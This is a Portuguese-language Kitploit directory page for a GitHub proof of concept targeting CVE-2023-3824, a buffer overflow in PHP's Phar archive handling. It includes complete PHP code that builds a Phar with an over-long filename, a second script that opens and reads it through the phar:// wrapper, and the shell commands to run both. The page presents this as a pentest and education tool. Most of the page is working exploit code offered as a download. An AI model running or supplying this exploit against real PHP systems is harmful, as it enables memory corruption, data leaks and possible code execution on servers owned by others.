Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-3824 — Vulnerabilidade em arquivos PHP Phar, devido a estouro de buffer, surge de verificações insuficientes de comprimento nos nomes de arquivos dentro do arquivo Phar. Atores maliciosos podem criar arquivos Phar com nomes de arquivo longos, levando a estouro de buffer e potencial execução de código malicioso ou vazamento de dados. Essa vulnerabilidade pode ser explorada para execução de código CVE-2023-3824 | Kitploit
Ferramentas/GitHubGitHub/jhonnybonny/cve-2023-3824
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoExploração de Binários
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
3246há 2 anosAinda não revisado

Sobre

Vulnerabilidade em arquivos PHP Phar, devido a estouro de buffer, surge de verificações insuficientes de comprimento nos nomes de arquivos dentro do arquivo Phar. Atores maliciosos podem criar arquivos Phar com nomes de arquivo longos, levando a estouro de buffer e potencial execução de código malicioso ou vazamento de dados. Essa vulnerabilidade pode ser explorada para execução de código CVE-2023-3824

Compartilhar

PHP - PoC de Arquivo Phar Malicioso (CVE-2023-3824)

Descrição

Esta Prova de Conceito (PoC) demonstra como criar um arquivo Phar malicioso em PHP e acionar uma vulnerabilidade de estouro de buffer.

Uso

Criando o Arquivo Phar Malicioso

  1. Crie um novo arquivo PHP (ex.: create_phar.php) e adicione o seguinte código:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

Execute o script PHP para criar o arquivo Phar malicioso: Copiar código

root@kitploit:~
php create_phar.php

Acionando o Estouro de Buffer

Crie outro arquivo PHP (ex.: trigger_overflow.php) e adicione o seguinte código:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

Execute o script PHP para acionar o estouro de buffer: Copiar código

root@kitploit:~
php trigger_overflow.php

A instrução var_dump($x) exibirá o resultado da operação de estouro de buffer e leitura excessiva.

Baixar ferramenta